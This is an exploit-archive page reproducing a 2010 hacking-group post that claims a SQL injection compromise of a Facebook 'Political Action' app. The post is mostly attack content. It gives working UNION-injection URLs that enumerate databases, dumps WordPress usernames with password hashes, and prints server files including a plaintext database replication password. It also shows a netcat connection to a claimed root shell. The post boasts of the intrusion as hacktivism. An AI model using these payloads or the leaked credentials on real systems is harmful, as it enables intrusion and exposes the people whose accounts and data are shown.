what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Facebook Political Action SQL Injection

Facebook Political Action SQL Injection
Posted Jul 20, 2010
Authored by Inj3ct0r

The Facebook Political Action application suffers from a remote SQL injection vulnerability that can in turn result in a full shell.

tags | exploit, remote, shell, sql injection
SHA-256 | 82c14ab9c9953a579378b5653467e8fbada6cb78c2bb527ce3aa13b46d034d50

Facebook Political Action SQL Injection

Change Mirror Download
====================================================
FaceBook's servers was hacked again by Inj3ct0r Team
====================================================



Part 1 Original: http://inj3ct0r.com/exploits/11638

Part 2 Original: http://inj3ct0r.com/exploits/13403


[+] English translation
Inj3ct0r official website => Inj3ct0r.com
Inj3ct0r community => 0xr00t.com

__ __ ___
__ __ /'__`\ /\ \__ /'__`\
/\_\ ___ /\_\/\_\L\ \ ___\ \ ,_\/\ \/\ \ _ __ ___ ___ ___ ___
\/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ /'___\ / __`\ /' __` __`\
\ \ \/\ \/\ \ \ \ \/\ \L\ \/\ \__/\ \ \_\ \ \_\ \ \ \/ __/\ \__//\ \L\ \/\ \/\ \/\ \
\ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ /\_\ \____\ \____/\ \_\ \_\ \_\
\/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ \/_/\/____/\/___/ \/_/\/_/\/_/
\ \____/
\/___/

[0x00] [Introduction]
[0x01] [Search for bugs / crash]
[0x02] [0wner]
[0x03] [Conclusion]
[0x04] [Greetz]


__ __ __
/'__`\ /'__`\ /'__`\
/\ \/\ \ __ _/\ \/\ \/\ \/\ \
\ \ \ \ \/\ \/'\ \ \ \ \ \ \ \ \
\ \ \_\ \/> </\ \ \_\ \ \ \_\ \
\ \____//\_/\_\\ \____/\ \____/
\/___/ \//\/_/ \/___/ \/___/
[Introduction]




In this log file you will read a limited version of the information gathered and provided, since the most important
parts are being kept private in order to be analyzed by the proper authorities and close loopholes in the system.

We did not change the main page, do not sell backup server does not delete files.

We have demonstrated the flaw in the system. Start =] ..



oooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo
Sir Zaid Personal RESPECT! y0u helped me in writing the article and find vulnerabilities
oooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo



__ __ _
/'__`\ /'__`\ /' \
/\ \/\ \ __ _/\ \/\ \/\_, \
\ \ \ \ \/\ \/'\ \ \ \ \/_/\ \
\ \ \_\ \/> </\ \ \_\ \ \ \ \
\ \____//\_/\_\\ \____/ \ \_\
\/___/ \//\/_/ \/___/ \/_/
[Search for bugs / crash]



inj3ct0r@host [/home]# ./inj3ct0r.com_0day_Search http://apps.facebook.com

...Search Vulnerabilities . . . . . . . . . .. . . .. . . . ..

[+] found 13 vulns and 6 warning
[+] open 31337 port yes
[+] connect...

Brevity the soul of wit..


inj3ct0r.com@mybox [~]

inj3ct0r.com@host [~]# cd /home

inj3ct0r@host [/home]# ./inj3ct0r.com_0day http://apps.facebook.com

...attack starting . . . . . . . . . .. . . .. . . . ..

__ __ ___
/'__`\ /'__`\ /'___`\
/\ \/\ \ __ _/\ \/\ \/\_\ /\ \
\ \ \ \ \/\ \/'\ \ \ \ \/_/// /__
\ \ \_\ \/> </\ \ \_\ \ // /_\ \
\ \____//\_/\_\\ \____//\______/
\/___/ \//\/_/ \/___/ \/_____/

[0wner]

Successful Shell on 31337 port . . . . .

inj3ct0r.com@host [/home]# ./nc -v 66.220.153.15 31337

...............................................................


apps.facebook@host [~]# id

uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)


-[0x33]- Proofs


############
# REQUESTS #
############

;===== BASIC INFO
http://apps.facebook.com/politicalaction/issue.php?issueid=1+and+1=2+UNION+SELECT+1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),3,4--+1

;===== LIST TABLES
http://apps.facebook.com/politicalaction/issue.php?issueid=1+and+1=2+UNION+SELECT+1,2,3,4,concat(table_schema,0x3a,table_name),6,7,8,9,10+FROM+information_schema.tables+WHERE+table_schema+!= 0x6d7973716c+AND+table_schema+!=+0x696e666f726d6174696f6e5f736368656d61--+1

;===== LIST COLUMNS
http://apps.facebook.com/politicalaction/issue.php?issueid=1+and+1=2+UNION+SELECT+1,2,3,4,concat(table_schema,0x3a,table_name,0x3a,column_name),6,7,8,9,10+FROM+information_schema.columns+WHERE+table_schema+!= 0x6d7973716c+AND+table_schema+!=+0x696e666f726d6174696f6e5f736368656d61--+1

;===== LIST WORDPRESS USERS/PASS
http://apps.facebook.com/politicalaction/issue.php?issueid=1+and+1=2+UNION+SELECT+1,2,3,4,concat(user_login,0x3a,user_pass),6,7,8,9,10+from+candukincaid.wp_users--+1

admin:$P$BQFUeKJK810OT9Y/Hmcx/hZdaRBEmw/
lucia:$P$BqEFbcc1.uPFB8SfIIDcmVq7pc40WK.
tom:$P$BlBjwW.57R/lHuoGLSUyAutopYdoEt/

-----

http://apps.facebook.com/politicalaction/issue.php?issueid=1+and+1=2+UNION+SELECT+1,2,3,4,concat(user_login,0x3a,user_pass),6,7,8,9,10+from+churchwpdb.wp_users--+1

admin:$P$B6RRs18hNYnYWPgNy0brmY/qPg3W7b.
test:$P$BuuuSp.VN0Ha5/p11u20ATdWqeEk

-----

http://apps.facebook.com/politicalaction/issue.php?issueid=1+and+1=2+UNION+SELECT+1,2,3,4,concat(user_login,0x3a,user_pass),6,7,8,9,10+from+luciacanduwp.wp_users--

admin:$P$B1jGLGuDkN6gNT68q92h3RG3wG4qwi/
lucia:$P$BBtUst3KjOqCdTNVVTGdWlgayz

################
# INFORMATIONS #
################
;===== PATH
/home/tomkincaid/tomkincaid.dreamhosters.com/facebookclient/shared_lib.php

;===== BASIC INFO
tomkincaid@ps5008.dreamhost.com
politicsapp
5.0.45-log

;===== TABLES

# astro
** app
** oscache
** user


# candukincaid
** wp_commentmeta
** wp_comments
** wp_links
** wp_options
** wp_postmeta
** wp_posts
** wp_px_albumPhotos
** wp_px_albums
** wp_px_galleries
** wp_px_photos
** wp_px_plugins
** wp_term_relationships
** wp_term_taxonomy
** wp_terms
** wp_usermeta
** wp_users

# cemeteries
** AmazonItem
** AmazonType
** CameraType
** Format
** Guestbook
** Links
** Photo
** Scan

# churchwpdb
** wp_comments
** eventscalendar_main
** icl_languages
** icl_languages_translations
** icl_locale_map
** icl_translations
** links
** options
** postmeta
** posts
** term_relationships
** term_taxonomy
** terms
** usermeta
** users

# countdownapp
** oscache
** user

# crush
** couple
** oscache
** user

# dare
** flag
** game
** item
** user

# friendiq
** oscache
** score
** user

# giants
** app
** league
** media
** mediaforuser
** oscache
** post
** team
** topic
** user

# hookup
** couple
** neverblue
** oscache
** user

# jauntlet
** user

# loccus
** checkin
** oscache
** user

# luciacanduwp
** wp_comments
** wp_links
** wp_options
** wp_postmeta
** wp_posts
** wp_term_relationships
** wp_term_taxonomy
** wp_terms
** wp_usermeta
** wp_users

# maps
** place
** user

# martisor
** user

# mediax
** oscache
** user

# mostlikely
** callback
** statement
** statementforuser
** user

# music
** itemforuser
** oscache
** user

# pimpfriends
** activity
** ad
** favorite
** gift
** giftforho
** hoforpimp
** johnforho
** oscache
** permission
** photoforuser
** room
** user
** wall
** whistle

# plans
** attend
** cache
** event
** place
** user

# politicsapp
** app
** badge
** badgeforuser
** issue
** oscache
** position
** positionforuser
** post
** user

# postergifts
** category
** categoryproduct
** categoryrelationship
** image
** oscache
** posterforuser
** user

# posters2
** category
** categoryproduct
** categoryrelationship
** image
** oscache
** posterforuser
** user

# projectbasecamp
** clicktimeproject
** clicktimereport
** clicktimetask
** idcorrelation
** projectbudget
** taskforuser
** user

# pwnfriends
** photo
** photoforfriend
** photoforuser
** user

# quiz
** app
** question
** quiz
** result
** resultforquestion
** resultforuser
** user

# seeall
** network
** networkforuser
** test2
** userpref

# send
** app
** item
** itemforuser
** neverblue
** user

# supporter
** oscache
** user

# swapu
** item
** itemforuser
** network
** networkforuser
** swaptype
** user

# tomsapps
** ad
** adclick
** app
** contest
** notification

# travelbug
** bug
** bugcache
** user

# tv
** app
** oscache
** post
** series
** seriesforuser
** thread
** threadforuser
** user

# wikitravel
** badmap
** wikitravelimage
** wikitravelpage


---------------------------------------------------------------------------------------------------------------------------------------------------

read /etc/hosts

127.0.0.1 localhost localhost.localdomain
192.168.1.167 140696-db2.flufffriends.com 140696-db2
192.168.1.166 140695-db1.flufffriends.com 140695-db1
192.168.1.165 140694-web2.flufffriends.com 140694-web2
192.168.1.164 140693-web1.flufffriends.com 140693-web1
69.63.176.141 api.facebook.com
208.116.17.80 peanutlabs.com

----------------------------------

/etc/my.cnf

#SERVER 5 IS THE MASTER FOR DB1 AND ROMIS FOR DB1

log-bin=/var/lib/mysqllogs/bin-log

binlog-do-db=fluff2

expire-logs-days=14



server-id = 2



#master-host=69.63.180.15

#master-user=tomkincaid_user

#master-password=tomkincaid123

#master-connect-retry=50

replicate-do-db=miserman


#log-slave-updates

expire_logs_days = 14


goOd =] Nice Hacking old school xD


__ __ __
/'__`\ /'__`\ /'__`\
/\ \/\ \ __ _/\ \/\ \/\_\L\ \
\ \ \ \ \/\ \/'\ \ \ \ \/_/_\_<_
\ \ \_\ \/> </\ \ \_\ \/\ \L\ \
\ \____//\_/\_\\ \____/\ \____/
\/___/ \//\/_/ \/___/ \/___/
[Conclusion]



There's no 100% security! Be safe my friends! Watch for vulnerabilities and promptly update! Watch for updates Inj3ct0r.com (Inj3ct0r Exploit Database)



__ __ __ __
/'__`\ /'__`\/\ \\ \
/\ \/\ \ __ _/\ \/\ \ \ \\ \
\ \ \ \ \/\ \/'\ \ \ \ \ \ \\ \_
\ \ \_\ \/> </\ \ \_\ \ \__ ,__\
\ \____//\_/\_\\ \____/\/_/\_\_/
\/___/ \//\/_/ \/___/ \/_/
[Greetz]



Greetz all users Inj3ct0r.com and 31337 Inj3ct0r Members!

31337 Inj3ct0r Members:

cr4wl3r, The_Exploited, eidelweiss, SeeMe, XroGuE, agix, gunslinger_, Sn!pEr.S!Te, indoushka,

Sid3^effects, L0rd CrusAd3r, Th3 RDX, r45c4l, Napst3r™, etc..

----------------------------------------------------------------------------------------------

Personally h4x0rz:
Sir Zaid (none)
Dante90 http://inj3ct0r.com/author/916
SONiC http://inj3ct0r.com/author/2545
**RoAd_KiLlEr** http://inj3ct0r.com/author/2447
MasterGipy http://inj3ct0r.com/author/2346

You are good hackers. Respect y0u!


Sir Zaid, Thank you that pushed me to write this article, and reported the dependence! Personal Respect to you from Inj3ct0r Team!

Friendly projects : Hack0wn.com , SecurityVulns.com, SecurityHome.eu, Xiya.org, Packetstormsecurity.org.. we have many friends)) Go http://inj3ct0r.com/links =]

At the time of publication, all requests to work! Attached images : inj3ct0r.com/facebook_part2.zip

We want to thank the following people for their contribution.

Do not forget to keep track of vulnerabilities in Inj3ct0r.com

H.A.C.K.T.I.V.I.S.M. WIN! =]

Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    42 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close